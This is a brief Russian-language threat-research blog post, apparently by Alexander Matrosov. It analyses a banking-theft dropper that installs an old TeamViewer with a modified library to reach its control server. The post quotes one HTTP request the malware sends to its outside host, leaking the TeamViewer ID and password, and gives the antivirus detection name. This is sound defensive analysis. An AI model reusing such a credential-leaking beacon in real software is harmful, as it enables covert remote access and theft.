TeamViewer, как компонент бэкдора

TeamViewer, как компонент бэкдора
Тут на днях коллегам из Group-IB попался интересный сэмпл, конечно он не просто так им попался и посредством него увели кругленькую сумму :) Собственно интересен он только тем, что дропер устанавливает в систему TeamViewer предыдущей версии с одной модифицированной библиотекой, через которую и происходит общение с админкой.


GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP/1.1
User-Agent: x3
Host: goeiuyi.net

Во всем остальном интересного там ничего нет и все более чем стандартно. Детектим мы его, как Win32/Sheldor.NAD ( VT).
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

ТВОЕ «МНЕ ПОМОГЛО» — ЭТО ДИАГНОЗ

Миру плевать на то, во что ты веришь. Твой личный опыт — это статистическая погрешность и ошибка выжившего. Пока ты лечишься подорожником и верой, умные люди смотрят на двойные слепые плацебо-контролируемые исследования. Узнай, почему быть циничным занудой выгоднее, чем восторженным идиотом.

 Включить критическое мышление
article-title

Александр Матросов

REFLECTIONS ABOUT REVERSE ENGINEERING, THREAT RESEARCH AND SOME MORE ...